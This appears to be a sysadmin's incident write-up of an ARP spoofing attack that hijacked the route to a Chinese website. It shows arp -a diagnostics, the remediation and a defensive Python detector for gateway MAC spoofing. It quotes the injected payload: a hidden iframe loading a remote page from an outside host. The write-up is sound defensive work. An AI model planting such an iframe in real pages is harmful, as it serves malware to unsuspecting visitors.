Recently the server hosting 电脑软硬件应用网 was hit by an ARP spoofing attack and its route was hijacked.
Injection signature: the following code was inserted into the page header:

    <iframe style='display:none;' src=http://cool.47555.com/k.htm></iframe>
Resolution and analysis (following the 绿盟 (NSFOCUS) route-hijacking case study):

During the attack:
    x:\Documents and Settings\Administrator>arp -a

    Interface: *.123.71.119 --- 0x2
      Internet Address      Physical Address      Type
      58.123.71.1           00-13-60-*-8e-c2      dynamic

    Interface: *.123.225.231 --- 0x3
      Internet Address      Physical Address      Type
      222.123.225.2         00-15-c5-ec-e2-8d     dynamic
      222.123.225.*         00-c0-*-82-5c-fa      dynamic
The machine with MAC 00-15-c5-ec-e2-8d was impersonating the gateway and had hijacked 电脑软硬件应用网. Checking the machines on the internal network showed that 00-15-c5-ec-e2-8d belonged to *.123.225.232, which sits on the same subnet as the 电脑软硬件应用网 server. That machine was shut down immediately, the ARP cache was flushed, and service returned to normal.
After recovery, arp showed the following:
    x:\Documents and Settings\Administrator>arp -a

    Interface: *.123.71.119 --- 0x2
      Internet Address      Physical Address      Type
      58.123.71.1           00-13-60-*-8e-c2      dynamic

    Interface: *.123.225.231 --- 0x3
      Internet Address      Physical Address      Type
      222.123.225.2         00-0e-38-6e-*-bf      dynamic

The gateway entry changed back from 00-15-c5-ec-e2-8d to 00-0e-38-6e-*-bf, and the site was working normally again.
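The diagnosis above boils down to two checks on the output of `arp -a`: does the gateway IP resolve to the MAC it is supposed to have, and is one MAC answering for more than one IP on the same interface. The script below is an added example, not part of the original post, that automates both checks so they can be run on a schedule rather than by eye. It parses the Windows `arp -a` row layout shown above; the interface addresses, MACs and the expected-gateway table are constructed sample values, and the function names are my own.

```python
import re
from typing import Dict, List, Tuple

# One ARP row in Windows `arp -a` output: "<ip>  <mac>  <dynamic|static>"
ROW_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+"
    r"(dynamic|static)\s*$",
    re.IGNORECASE,
)
# Section header: "Interface: <ip> --- 0x3"
IFACE_RE = re.compile(r"^Interface:\s+(\S+)\s+---")


def parse_arp_table(text: str) -> Dict[str, Dict[str, str]]:
    """Return {interface_ip: {ip: mac}} parsed from `arp -a` output (MACs lower-cased)."""
    tables: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        m = IFACE_RE.match(line.strip())
        if m:
            current = m.group(1)
            tables[current] = {}
            continue
        m = ROW_RE.match(line)
        if m and current is not None:
            ip, mac, _entry_type = m.groups()
            tables[current][ip] = mac.lower()
    return tables


def check_gateways(tables: Dict[str, Dict[str, str]],
                   expected: Dict[str, str]) -> List[str]:
    """Flag every interface whose cached MAC for a known gateway IP differs from the baseline."""
    alerts = []
    for iface, entries in tables.items():
        for gw_ip, good_mac in expected.items():
            seen = entries.get(gw_ip)
            if seen is not None and seen != good_mac.lower():
                alerts.append(f"{iface}: gateway {gw_ip} is {seen}, expected {good_mac.lower()}")
    return alerts


def find_duplicate_macs(tables: Dict[str, Dict[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """One MAC cached for several IPs on the same interface is a classic spoofing sign."""
    dups = []
    for iface, entries in tables.items():
        by_mac: Dict[str, List[str]] = {}
        for ip, mac in entries.items():
            by_mac.setdefault(mac, []).append(ip)
        for mac, ips in by_mac.items():
            if len(ips) > 1:
                dups.append((iface, mac, sorted(ips)))
    return dups


# Constructed sample: the gateway 10.0.0.1 should be aa-bb-cc-00-00-01, but
# host 10.0.0.32 (aa-bb-cc-00-00-02) is answering ARP for it.
EXPECTED_GATEWAYS = {"10.0.0.1": "aa-bb-cc-00-00-01"}

ATTACK_SAMPLE = """\
Interface: 10.0.0.31 --- 0x3
  Internet Address      Physical Address      Type
  10.0.0.1              aa-bb-cc-00-00-02     dynamic
  10.0.0.32             aa-bb-cc-00-00-02     dynamic
"""

NORMAL_SAMPLE = """\
Interface: 10.0.0.31 --- 0x3
  Internet Address      Physical Address      Type
  10.0.0.1              aa-bb-cc-00-00-01     dynamic
  10.0.0.32             aa-bb-cc-00-00-02     dynamic
"""


def audit(text: str) -> Dict[str, list]:
    """Run both checks over one `arp -a` capture and return the findings."""
    tables = parse_arp_table(text)
    return {
        "gateway_mismatch": check_gateways(tables, EXPECTED_GATEWAYS),
        "duplicate_macs": find_duplicate_macs(tables),
    }


if __name__ == "__main__":
    for label, sample in (("during attack", ATTACK_SAMPLE), ("after recovery", NORMAL_SAMPLE)):
        print(label, audit(sample))
```

To run it against a live host, feed the text of `arp -a` into `audit()` instead of the samples; the baseline gateway MAC should come from the router itself, not from a cache that may already be poisoned. Pinning the gateway with a static entry (`arp -s <gateway-ip> <gateway-mac>`) and clearing the poisoned cache with `arp -d` are the usual Windows-side responses once a mismatch is confirmed.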